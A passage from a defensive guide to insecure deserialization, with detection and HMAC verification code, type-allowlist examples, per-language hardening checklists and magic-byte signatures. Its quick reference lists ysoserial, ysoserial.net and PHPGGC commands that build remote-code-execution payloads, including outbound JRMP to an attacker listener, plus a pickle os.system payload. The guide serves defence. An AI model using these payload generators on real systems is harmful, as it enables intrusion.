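One way to turn that signal into an alert is a sliding-window counter over matching log lines. This is a minimal sketch with assumed values: the `SIGNAL_EXCEPTIONS` list mirrors the exception names above, while the `SpikeDetector` class, the 60-second window, and the threshold of 5 are illustrative choices that would need tuning against real traffic.

```python
from collections import deque

SIGNAL_EXCEPTIONS = (
    "ClassCastException",
    "InvalidClassException",
    "StreamCorruptedException",
    "UnpicklingError",
)


def is_signal(log_line: str) -> bool:
    """True if the log line mentions one of the watched exception names."""
    return any(name in log_line for name in SIGNAL_EXCEPTIONS)


class SpikeDetector:
    """Flags when at least `threshold` events fall inside the time window."""

    def __init__(self, window_seconds=60.0, threshold=5):
        self.window = window_seconds
        self.threshold = threshold
        self.events = deque()

    def record(self, timestamp: float) -> bool:
        self.events.append(timestamp)
        # Drop events that have aged out of the window.
        while self.events and self.events[0] <= timestamp - self.window:
            self.events.popleft()
        return len(self.events) >= self.threshold
```

A log shipper would call `record(ts)` for every line where `is_signal(line)` is true and page when it returns `True`.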


14. Prevention & Mitigation

The hierarchy of fixes (strongest first)

1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”

2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key, and verify the signature before invoking any deserialization. This does not make deserialization safe; it only ensures the bytes came from your own code. Rails’ ActiveSupport::MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: a leaked key (ASP.NET machine key, Rails secret_key_base) makes forging a valid payload trivial, as ViewState exploits repeatedly demonstrate.
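
The verify-before-deserialize ordering looks roughly like this in Python. It is a sketch under assumptions: `seal` and `open_sealed` are hypothetical helper names, the tag is simply prepended to the payload, and key storage and rotation are out of scope.

```python
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for HMAC-SHA256


def seal(payload: bytes, key: bytes) -> bytes:
    """Prepend an HMAC-SHA256 tag to the serialized payload."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def open_sealed(blob: bytes, key: bytes) -> bytes:
    """Return the payload only if its tag verifies; raise otherwise.

    The caller deserializes the returned bytes, never the raw blob.
    """
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position through timing.
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, expected):
        raise ValueError("signature check failed")
    return payload
```

The important property is structural: the deserializer is unreachable unless `open_sealed` returns, so tampered or foreign bytes never get parsed.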

3. Apply type allowlists at the deserializer.

  • Java: ObjectInputFilter.Config.setSerialFilter(...) globally, or per-stream via ois.setObjectInputFilter(...) (JEP 290). Allowlist expected classes only.
  • .NET: abandon BinaryFormatter. If unavoidable, a SerializationBinder restricting types is the documented mitigation — but Microsoft explicitly says this cannot be made secure.
  • Python: subclass pickle.Unpickler, override find_class(module, name) to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies.
  • Ruby: wrap Marshal.load — no built-in filter exists. Trail of Bits recommends adding Marshal.safe_load upstream.
  • PHP: unserialize($data, ['allowed_classes' => ['ExpectedClass']]) (PHP 7.0+) restricts instantiation but does not prevent __wakeup/__destruct on allowed classes from being abused.
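
For the Python bullet, the documented `find_class` override can be sketched as follows. The `ALLOWED` set here is an example chosen for illustration, not a recommended policy, and `AllowlistUnpickler` and `safe_loads` are hypothetical names.

```python
import io
import pickle

# Example allowlist of (module, name) pairs; tailor it to the data you expect.
ALLOWED = {
    ("collections", "OrderedDict"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(data: bytes):
    """Unpickle data, refusing any global outside the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Plain containers, strings, and numbers load normally because they need no global lookup, while a payload that references `os.system` fails inside `find_class` before anything is called. Every class added to the allowlist widens the surface, since its own reconstruction hooks then run on attacker-shaped state.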

4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:

  • No network egress to metadata services or internal endpoints
  • Read-only filesystem where possible
  • Minimal privileges (non-root, no cloud credentials via IMDS)
  • Resource limits to bound DoS blast radius

5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.

Format-specific migration targets

| From | To |
| --- | --- |
| Java ObjectInputStream | JSON (Jackson with fixed types, no default typing) or Protobuf |
| PHP unserialize | json_encode / json_decode with explicit fields |
| Python pickle for models | Safetensors for tensors, ONNX for graphs, JSON for metadata |
| Python pickle for IPC | JSON, MessagePack, Protobuf |
| Ruby Marshal | JSON with typed columns, MessagePack, Protobuf |
| .NET BinaryFormatter | System.Text.Json or DataContractSerializer with known types |
| ASP.NET ViewState | Stateless pages, signed tokens, server-side session |
| YAML with types | safe_load / SafeConstructor; never yaml.load without SafeLoader (PyYAML) or Yaml().load (SnakeYAML <2.0) |

ML pipeline hardening checklist

Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:

  • Migrate model weights to safetensors wherever possible. Default in HuggingFace transformers since 2022.
  • Set torch.load(..., weights_only=True) on every load site. torch.load without this is a code review finding.
  • Never call joblib.load on user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted.
  • Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
  • If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
  • Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf. recv_pyobj() is the anti-pattern.
  • Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations — LightLLM’s empty-string nonce is the cautionary tale.
  • Scan model uploads with ModelScan + Fickling, knowing both have bypasses.
  • Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
  • Log every model load path. Alert on loads from unexpected origins.
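
The "verify before load" item can be sketched with digest pinning, which is a simpler stand-in for full artifact signing: it assumes a trusted manifest of SHA-256 digests already exists and is stored separately from the model files. `sha256_file`, `verify_artifact`, and the `pinned` mapping are hypothetical names for this example.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path, pinned):
    """Return path if its digest matches the pinned value, else raise.

    `pinned` maps file names to expected hex digests (assumed trusted).
    """
    expected = pinned.get(Path(path).name)
    if expected is None:
        raise PermissionError(f"no pinned digest for {path}")
    if not hmac.compare_digest(sha256_file(path), expected):
        raise PermissionError(f"digest mismatch for {path}")
    return path
```

A loader would call `verify_artifact(path, pinned)` and only then hand the path to the model-loading function; a failed check is also a natural place to emit the load-path log entry.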

.NET / SharePoint hardening checklist (post-ToolShell)

  • Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
  • Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
  • Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
  • Restrict ViewState to MAC-validated, encrypted mode.
  • Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
  • Inventory BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter usages and plan retirement.
  • Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
  • Monitor w3wp.exe spawning cmd.exe, powershell.exe, certutil.exe.

Java hardening checklist

  • Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
  • Inventory and upgrade: commons-collections (>=3.2.2 disables deserialization of unsafe functors by default; >=4.1 for 4.x), commons-beanutils (>=1.9.4), jackson-databind (latest), xstream (>=1.4.20), snakeyaml (>=2.0), log4j (>=2.17.1).
  • Remove Jackson default typing. Never call enableDefaultTyping() or set @JsonTypeInfo(use = Id.CLASS) on untrusted input.
  • Disable RMI registry exposure. Do not publish JMX on untrusted networks.
  • Retire XMLDecoder for untrusted input entirely.
  • Audit any custom readObject, readResolve, readExternal methods in your own code.
  • Set up outbound firewall rules from JVM processes — block unexpected JRMP/LDAP traffic.

PHP hardening checklist

  • Replace all unserialize($untrusted) with json_decode($untrusted) where possible.
  • Where replacement is infeasible, use unserialize($data, ['allowed_classes' => false]) or a tight allowlist.
  • Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
  • Audit all file operations for phar:// reachability from user input.
  • Store session data using a non-serializing handler or sign cookies.
  • Disable unserialize_callback_func.
  • Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.

Ruby hardening checklist

  • Replace Marshal.load(untrusted) with JSON with explicit schema.
  • Migrate Rails cache store off :marshal (Rails 7.1+ defaults to :json for some stores; verify).
  • Upgrade Ruby to 3.1+ for YAML.load safe default.
  • Disable JSON.parse(create_additions: true) and Oj.load default mode.
  • Run Trail of Bits’s Semgrep rules in CI: marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization.
  • Audit any custom marshal_load / marshal_dump methods.

15. Signature & Gadget Quick Reference

Magic bytes / payload prefixes

Java serialized (raw):        AC ED 00 05
Java serialized (base64):     rO0AB
.NET BinaryFormatter:         00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64):   AAEAAAD/////AQAAAA
Python pickle (proto 2):      80 02
Python pickle (proto 4):      80 04
Python pickle (proto 5):      80 05
Ruby Marshal:                 04 08
PHP serialized object:        O:<digit>+:"
PHP serialized array:         a:<digit>+:{
ASP.NET ViewState prefix:     /wEP / /wEX / /wET
PHAR stub:                    <?php __HALT_COMPILER();
SnakeYAML tag prefix:         !!javax. / !!org. / !!java.
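
These prefixes translate directly into a cheap request-body classifier. The sketch below is illustrative only: `sniff` and its labels are made-up names, it checks only the start of the body, and the two-byte prefixes (pickle, Ruby Marshal) will produce false positives on arbitrary binary data.

```python
import re

# (label, compiled pattern) pairs, checked in order against the body start.
SIGNATURES = [
    ("java-serialized", re.compile(rb"\xac\xed\x00\x05")),
    ("java-serialized-base64", re.compile(rb"rO0AB")),
    ("dotnet-binaryformatter",
     re.compile(re.escape(bytes.fromhex("0001000000ffffffff01000000")))),
    ("dotnet-binaryformatter-base64", re.compile(rb"AAEAAAD/////")),
    ("python-pickle", re.compile(rb"\x80[\x02-\x05]")),
    ("ruby-marshal", re.compile(rb"\x04\x08")),
    ("php-object", re.compile(rb'O:\d+:"')),
    ("php-array", re.compile(rb"a:\d+:\{")),
    ("phar-stub", re.compile(rb"<\?php __HALT_COMPILER\(\);")),
]


def sniff(body: bytes):
    """Return the first matching signature label, or None."""
    for label, pattern in SIGNATURES:
        if pattern.match(body):
            return label
    return None
```

A hit is a reason to log and inspect, not proof of an attack; legitimate clients of a Java RMI or ViewState endpoint send the same prefixes.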

Java ysoserial chain selector

ysoserial CommonsCollections1 "cmd"   # JDK ≤ 8u71 + commons-collections 3.x
ysoserial CommonsCollections5 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd"     # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd"               # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd"            # hibernate 3.x
ysoserial Jdk7u21 "cmd"               # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "host:port"      # outbound JRMP to attacker listener
ysoserial URLDNS "http://probe.dns/"  # blind probe, no RCE
ysoserial Spring1 "cmd"               # older spring-core
ysoserial ROME "cmd"                  # ROME 1.0
ysoserial MozillaRhino1 "cmd"         # mozilla rhino
ysoserial Click1 "cmd"                # click framework
ysoserial Clojure "cmd"               # clojure 1.x
ysoserial C3P0 "http://host/:Exploit" # c3p0 remote class load; arg is <base_url>:<class_name>

.NET ysoserial.net gadgets

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"

PHPGGC chain selector

phpggc -l laravel       # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id   # base64 URL-encoded
phpggc -p zip -o payload.phar Monolog/RCE1 system id

Python pickle one-liner test

import pickle, os
class P:
    def __reduce__(self):
        return (os.system, ("id",))
payload = pickle.dumps(P())
# Never use this on production systems — defensive validation only

Ruby Marshal gadget family (current canonical)

Gem::SpecFetcher
 └─ Gem::Version
     └─ Gem::RequestSet::Lockfile
         └─ Gem::RequestSet
             └─ Gem::Resolver::SpecSpecification
                 └─ Gem::Resolver::GitSpecification
                     └─ Gem::Source::Git
                         └─ git clone with backtick-injected reference
                             └─ shell metacharacter expansion → RCE

Magic method hooks by language

| Language | Hooks fired during / after deserialization |
| --- | --- |
| Java | readObject, readResolve, readObjectNoData, readExternal, validateObject, custom finalize |
| PHP | __wakeup, __unserialize, __destruct, __toString, __call, __invoke, __get, __set |
| Python (pickle) | __reduce__, __reduce_ex__, __setstate__, __getstate__, __new__, __init_subclass__ |
| .NET | [OnDeserializing], [OnDeserialized], ISerializable.GetObjectData, constructor with SerializationInfo, IDeserializationCallback.OnDeserialization |
| Ruby (Marshal) | marshal_load, _load, _dump_data, init_with (YAML), encode_with |
| Node.js | toJSON, any property getters triggered during reconstruction, eval-based schemes via Function strings |

Universal defensive rule of thumb

If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.


Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, TrailOfBits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.